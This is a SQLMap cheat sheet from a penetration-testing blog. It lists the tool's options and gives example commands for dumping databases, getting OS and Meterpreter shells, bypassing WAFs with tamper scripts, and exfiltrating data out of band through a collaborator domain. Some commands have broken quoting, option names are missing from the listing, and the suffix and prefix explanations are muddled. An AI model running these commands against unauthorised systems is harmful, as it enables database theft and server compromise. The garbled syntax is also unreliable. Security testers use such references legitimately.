What is SQLMap?

SQLMap is a SQL Injection automation tool that is finds and exploits SQL Injection vulnerabilities. SQLMap has a number of functionality that can assist from fingerprinting to fully compromising a database and/or in some cases gaining shell level access to a server. If you do not have a current understanding of the fundamentals of how a SQL injection vulnerability occurs or is exploited, see our documentation on what is SQL injection for an overview.

TIP: How To Use SQLMap

I personally use SQLMap as an exploitation tool, due to the large amount of resources and traffic the tool uses I personally find that detection is better done manually or using other detection tools such as Burp Suite scanner.

How to use SQLMap

SQLMap could be used within an automation system to detect and exploit SQL injection (SQLi) vulnerabilities in web applications, or as a SQLi exploitation tool to use after a proof of concept SQLi payload has been confirmed.


Depending on the configuration SQLMap can be very heavy on request sent to a web application, and may cause DoS conditions for webservers and cause an excessive amount of log files for the target.

The more information you can give SQLMap the faster and less requests the tool will make, for example if you know the backend DBMS is MySQL and it is vulnerable to time based injection, then this could be provided to SQLMap using --dbms=mysql and –technique=T.

How to Install SQLMap

Install SQLMap via github:

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

How to Update SQLMap

How to update SQLMap:

python sqlmap.py --update 

or cd into the github repo director and do:

git pull 

SQLMap Commands

SQLMap Options

Basic SQLMap command options:


-h, --help

Show basic help message and exit


Show advanced help message and exit


Show program's version number and exit


Verbosity level: 0-6 (default 1)

SQLMap Target

SQLMap target command options:


-u URL, --url=URL

Target URL (e.g. "http://www.site.com/vuln.php?id=1")


Connection string for direct database connection


Parse target(s) from Burp or WebScarab proxy log file


Scan multiple targets given in a textual file


Load HTTP request from a file


Process Google dork results as target URLs


Load options from a configuration INI file

SQLMap Requests

SQLMap request command options:


-A AGENT, --user..

HTTP User-Agent header value

-H HEADER, --hea..

Extra header (e.g. "X-Forwarded-For:")


Force usage of given HTTP method (e.g. PUT)


Data string to be sent through POST (e.g. "id=1")


Character used for splitting parameter values (e.g. &)


HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")


Character used for splitting cookie values (e.g. ;)


Live cookies file used for loading up-to-date values


File containing cookies in Netscape/wget format


Ignore Set-Cookie header from response


Imitate smartphone through HTTP User-Agent header


Use randomly selected HTTP User-Agent header value


HTTP Host header value


HTTP Referer header value


Extra headers (e.g. "Accept-Language: fr\nETag: 123")


HTTP authentication type (Basic, Digest, NTLM or PKI)


HTTP authentication credentials (name:password)


HTTP authentication PEM cert/private key file


Ignore (problematic) HTTP error code (e.g. 401)


Ignore system default proxy settings


Ignore redirection attempts


Ignore connection timeouts


Use a proxy to connect to the target URL


Proxy authentication credentials (name:password)


Load proxy list from a file


Requests between change of proxy from a given list


Use Tor anonymity network


Set Tor proxy port other than default


Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))


Check to see if Tor is used properly


Delay in seconds between each HTTP request


Seconds to wait before timeout connection (default 30)


Retries when the connection timeouts (default 3)


Randomly change value for given parameter(s)


URL address to visit frequently during testing


POST data to send to a safe URL


Load safe HTTP request from a file


Regular requests between visits to a safe URL


Skip URL encoding of payload data


Parameter used to hold anti-CSRF token


URL address to visit for extraction of anti-CSRF token


HTTP method to use during anti-CSRF token page visit


Retries for anti-CSRF token retrieval (default 0)


Force usage of SSL/HTTPS


Use HTTP chunked transfer encoded (POST) requests


Use HTTP parameter pollution method


Evaluate provided Python code before the request (e.g. "import hashlib;id2=hashlib.md5(id).hexdigest()")

SQLMap Optimisation

SQLMap optimisation command options:



Turn on all optimization switches


Predict common queries output


Use persistent HTTP(s) connections


Retrieve page length without actual HTTP response body


Max number of concurrent HTTP(s) requests (default 1)

SQLMap Injection

SQLMap injection command options:



Testable parameter(s)


Skip testing for given parameter(s)


Skip testing parameters that not appear to be dynamic


Regexp to exclude parameters from testing (e.g. "ses")


Select testable parameter(s) by place (e.g. "POST")


Force back-end DBMS to provided value


DBMS authentication credentials (user:password)


Force back-end DBMS operating system to provided value


Use big numbers for invalidating values


Use logical operations for invalidating values


Use random strings for invalidating values


Turn off payload casting mechanism


Turn off string escaping mechanism


Injection payload prefix string


Injection payload suffix string


Use given script(s) for tampering injection data

SQLMap Detection

SQLMap detection command options:



Level of tests to perform (1-5, default 1)


Risk of tests to perform (1-3, default 1)


String to match when query is evaluated to True


String to match when query is evaluated to False


Regexp to match when query is evaluated to True


HTTP code to match when query is evaluated to True


Perform thorough tests only if positive heuristic(s)


Compare pages based only on the textual content


Compare pages based only on their titles

SQLMap Techniques

SQLMap technique command options:



SQL injection techniques to use (default "BEUSTQ")


Seconds to delay the DBMS response (default 5)


Range of columns to test for UNION query SQL injection


Character to use for bruteforcing number of columns


Table to use in FROM part of UNION query SQL injection


Domain name used for DNS exfiltration attack


Resulting page URL searched for second-order response


Load second-order HTTP request from file

SQLMap Fingerprinting

SQLMap fingerprint command options:


-f, --fingerprint

Perform an extensive DBMS version fingerprint

SQLMap Enumeration

SQLMap enumeration command options:


-a, --all

Retrieve everything

-b, --banner

Retrieve DBMS banner


Retrieve DBMS current user


Retrieve DBMS current database


Retrieve DBMS server hostname


Detect if the DBMS current user is DBA


Enumerate DBMS users


Enumerate DBMS users password hashes


Enumerate DBMS users privileges


Enumerate DBMS users roles


Enumerate DBMS databases


Enumerate DBMS database tables


Enumerate DBMS database table columns


Enumerate DBMS schema


Retrieve number of entries for table(s)


Dump DBMS database table entries


Dump all DBMS databases tables entries


Search column(s), table(s) and/or database name(s)


Check for DBMS comments during enumeration


Retrieve SQL statements being run on DBMS


DBMS database to enumerate


DBMS database table(s) to enumerate


DBMS database table column(s) to enumerate


DBMS database identifier(s) to not enumerate


DBMS user to enumerate


Exclude DBMS system databases when enumerating tables


Pivot column name


Use WHERE condition while table dumping


First dump table entry to retrieve


Last dump table entry to retrieve


First query output word character to retrieve


Last query output word character to retrieve


SQL statement to be executed


Prompt for an interactive SQL shell


Execute SQL statements from given file(s)

SQLMap Brute Force

SQLMap brute force command options:



Check existence of common tables


Check existence of common columns


Check existence of common files

SQLMap Custom User Defined Options

SQLMap custom command options:



Inject custom user-defined functions


Local path of the shared library

SQLMap File System Options

SQLMap file system command options, e.g., how to read a file from the command line using SQLMap:



Read a file from the back-end DBMS file system


Write a local file on the back-end DBMS file system


Back-end DBMS absolute filepath to write to

SQLMap Operating System Access

SQLMap OS command options, e.g., how to gain a shell via SQLMap:



Execute an operating system command


Prompt for an interactive operating system shell


Prompt for an OOB shell, Meterpreter or VNC


One click prompt for an OOB shell, Meterpreter or VNC


Stored procedure buffer overflow exploitation


Database process user privilege escalation


Local path where Metasploit Framework is installed


Remote absolute path of temporary files directory

SQLMap Windows Registry Access



Read a Windows registry key value


Write a Windows registry key value data


Delete a Windows registry key value


Windows registry key


Windows registry key value


Windows registry key value data


Windows registry key value type

General SQLMap Commands

SQLMap general command options:



Load session from a stored (.sqlite) file


Log all HTTP traffic into a textual file


Set predefined answers (e.g. "quit=N,follow=N")


Parameter(s) containing Base64 encoded data


Use URL and filename safe Base64 alphabet (RFC 4648)


Never ask for user input, use the default behavior


Result fields having binary values (e.g. "digest")


Check Internet connection before assessing the target


Clean up the DBMS from sqlmap specific UDF and tables


Crawl the website starting from the target URL


Regexp to exclude pages from crawling (e.g. "logout")


Delimiting character used in CSV output (default ",")


Blind SQL injection charset (e.g. "0123456789abcdef")


Format of dumped data (CSV (default), HTML or SQLITE)


Character encoding used for data retrieval (e.g. GBK)


Display for each output the estimated time of arrival


Flush session files for current target


Parse and test forms on target URL


Ignore query results stored in session file


Use Google dork results from specified page number


Log all HTTP traffic into a HAR file


Use hex conversion during data retrieval


Custom output directory path


Parse and display DBMS error messages from responses


Use given script(s) for preprocessing (request)


Use given script(s) for postprocessing (response)


Redump entries having unknown character marker (?)


Save options to a configuration INI file


Regexp for filtering targets


Skip heuristic detection of SQLi/XSS vulnerabilities


Skip heuristic detection of WAF/IPS protection


Prefix used for temporary tables (default: "sqlmap")


Select tests by payloads and/or titles (e.g. ROW)


Skip tests by payloads and/or titles (e.g. BENCHMARK)


Web server document root directory (e.g. "/var/www")

Misc SQLMap Commands

SQLMap commands that don’t fit into any other category :)



Use short mnemonics (e.g. "flu,bat,ban,tec=EU")


Run host OS command(s) when SQL injection is found


Beep on question and/or when SQLi/XSS/FI is found


Check for missing (optional) sqlmap dependencies


Disable console output coloring


Display list of available tamper scripts


Work in offline mode (only use session data)


Safely remove all content from sqlmap data directory


Location of CSV results file in multiple targets mode


Prompt for an interactive sqlmap shell


Local directory for storing temporary files


Adjust options for unstable connections


Update sqlmap


Simple wizard interface for beginner users

SQLMap Examples: How To…

Enumerate Databases

How to enumerate the databases tables using SQLMap:

sqlmap -u "https://highon.coffee" --dbs 

Enumerate Tables

How to enumerate the database tables using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" --tables 

SQLMap Dump DB Table

How to dump the contents of the table using SQLMap:

sqlmap -u "https://highon.coffee" -D "$database-name" -T "$table-name" --dump 

SQLMap from Burp file

Save a Burp or Zap request file and mark the injection point(s) parameters with an asterisk (*), the good thing about this option is that it takes care of any authentication cookies for you. You can inject into any parameter in the request, e.g., headers, inside cookies, and using multiple methods (GET, PUT, POST, DELETE) etc.

sqlmap -r request.burp 

Custom SQL Injection Payload: Pre and Post Input

In a scenario where you have identified a SQL injection manually or via another tool, you may need to suffix (have input entered before the SQL injection payload) or postfix (have input inserted after the injection payload), this can be accomplished using the following:

How to insert input before an injection payload:

sqlmap -u "https://highon.coffee" -dbs --suffix="blah"  

How to insert input after an injection payload:

sqlmap -u "https://highon.coffee" -dbs --postfix="--+"  

SQLMap Shell

How to get an operating system command shell with SQLMap:


How to execute a command with SQLMap:

--os-cmd uname 

Meterpreter Shell with SQLMap:


SQLMap WAF Bypass

To bypass WAF’s with SQLMap you can use the premade tamper scripts with --tamper like in the following example:

sqlmap -u “https://highon.coffee/?espresso=*--tamper="apostrophemask,apostrophenullencode,randomcase"

Tamper Scripts Send a LOT of Requests

Tamper scripts will resend the same request for each of the SQLMap WAF bypass scripts that you add.

List of SQLMap Tamper Scripts:

Tamper Description    
apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart    
apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart    
appendnullbyte.py Appends encoded NULL byte character at the end of payload    
base64encode.py Base64 all characters in a given payload    
between.py Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’    
bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator    
chardoubleencode.py Double url-encodes all characters in a given payload (not processing already encoded)    
commalesslimit.py Replaces instances like ‘LIMIT M, N’ with ‘LIMIT N OFFSET M’    
commalessmid.py Replaces instances like ‘MID(A, B, C)’ with ‘MID(A FROM B FOR C)’    
concat2concatws.py Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’    
charencode.py Url-encodes all characters in a given payload (not processing already encoded)    
charunicodeencode.py Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)    
equaltolike.py Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’    
escapequotes.py Slash escape quotes (‘ and “)    
greatest.py Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart    
halfversionedmorekeywords.py Adds versioned MySQL comment before each keyword    
ifnull2ifisnull.py Replaces instances like ‘IFNULL(A, B)’ with ‘IF(ISNULL(A), B, A)’    
modsecurityversioned.py Embraces complete query with versioned comment    
modsecurityzeroversioned.py Embraces complete query with zero-versioned comment    
multiplespaces.py Adds multiple spaces around SQL keywords    
nonrecursivereplacement.py Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace(“SELECT”, “”)) filters    
percentage.py Adds a percentage sign (‘%’) infront of each character    
overlongutf8.py Converts all characters in a given payload (not processing already encoded)    
randomcase.py Replaces each keyword character with random case value    
randomcomments.py Add random comments to SQL keywords    
securesphere.py Appends special crafted string    
sp_password.py Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs    
space2comment.py Replaces space character (‘ ‘) with comments    
space2dash.py Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a random string and a new line (‘\n’)    
space2hash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)    
space2morehash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a random string and a new line (‘\n’)    
space2mssqlblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
space2mssqlhash.py Replaces space character (‘ ‘) with a pound character (‘#’) followed by a new line (‘\n’)    
space2mysqlblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
space2mysqldash.py Replaces space character (‘ ‘) with a dash comment (‘–’) followed by a new line (‘\n’)    
space2plus.py Replaces space character (‘ ‘) with plus (‘+’)    
space2randomblank.py Replaces space character (‘ ‘) with a random blank character from a valid set of alternate characters    
symboliclogical.py Replaces AND and OR logical operators with their symbolic counterparts (&& and   )
unionalltounion.py Replaces UNION ALL SELECT with UNION SELECT    
unmagicquotes.py Replaces quote character (‘) with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)    
uppercase.py Replaces each keyword character with upper case value ‘INSERT’    
varnish.py Append a HTTP header ‘X-originating-IP’    
versionedkeywords.py Encloses each non-function keyword with versioned MySQL comment    
versionedmorekeywords.py Encloses each keyword with versioned MySQL comment    
xforwardedfor.py Append a fake HTTP header ‘X-Forwarded-For’    

SQLMap Proxy

It is possible to proxy SQLMap traffic via an upstream proxy such as Burp Suite by passing the following syntax to the tool:

sqlmap --proxy= 

Burp Proxy Performance Hit

In my experience using Burp Suite as a Proxy for this process results in a considerable slow down in performance.

SQLMap Blind SQLi Out of Band (OOB)

sqlmap -u “https://highon.coffee/?espresso=*--dns-domain=$your-collab-url

SQLMap GET Parameter

The following specifies the GET parameter “espresso” for injection:

sqlmap -u “https://highon.coffee/?espresso=*-p espresso 

SQLMap POST Parameter

The following specifies the POST parameter “espresso” for injection:

sqlmap -u “https://highon.coffee/?espresso=*--data “espresso=*

Run SQL Queries

You can run a SQL query using –sql-query for example:

sqlmap -u highon.coffee -D $database-name --sql-query="SELECT * FROM $table;"

URL Parameters in Friendly URL’s

Simply mark them with an asterisk(*), for example:


The above would set the injection point at parameter1.

SQLMap Crawl & Exploit

Useful for automation, however please be mindful of the overheads you are imposing on the target server:

python3 sqlmap.py --crawl=5 --threads=5 --risk=3 --level=5 --batch --answers="keep testing=Y,sitemap=Y,skip further tests=N" --crawl-exclude="logout" --forms --tamper=apostrophemask,apostrophenullencode,randomcase --dns-domain=$your-collab-url --random-agent -u https://highon.coffee

You will need to replace your collaborator payloads URL, and I highly recommend you setup your own collaborator server for this.

If you found this SQLMap cheat sheet useful, please share it below.

Document Changelog

  • Last Updated: 12/02/2024 (12th of February 2024)
  • Author: Arr0way
  • Notes: SQLMap cheat sheet created.